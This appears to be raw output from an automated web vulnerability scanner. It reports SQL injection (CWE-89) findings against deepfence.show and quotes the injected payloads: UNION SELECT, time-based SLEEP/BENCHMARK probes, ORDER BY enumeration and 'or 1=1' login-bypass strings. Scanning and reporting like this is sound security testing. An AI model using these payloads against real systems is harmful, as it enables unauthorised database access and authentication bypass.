href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1463Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1464\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '%20o/**/r%201/0%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1465\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1466\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1467\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nSensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryAlerts hints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1468\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or '1'='1'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1469\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1470\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1471Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1472\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1473\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# &&SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1474\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or \"1\"=\"1\"#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1475\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 6#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1476Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token 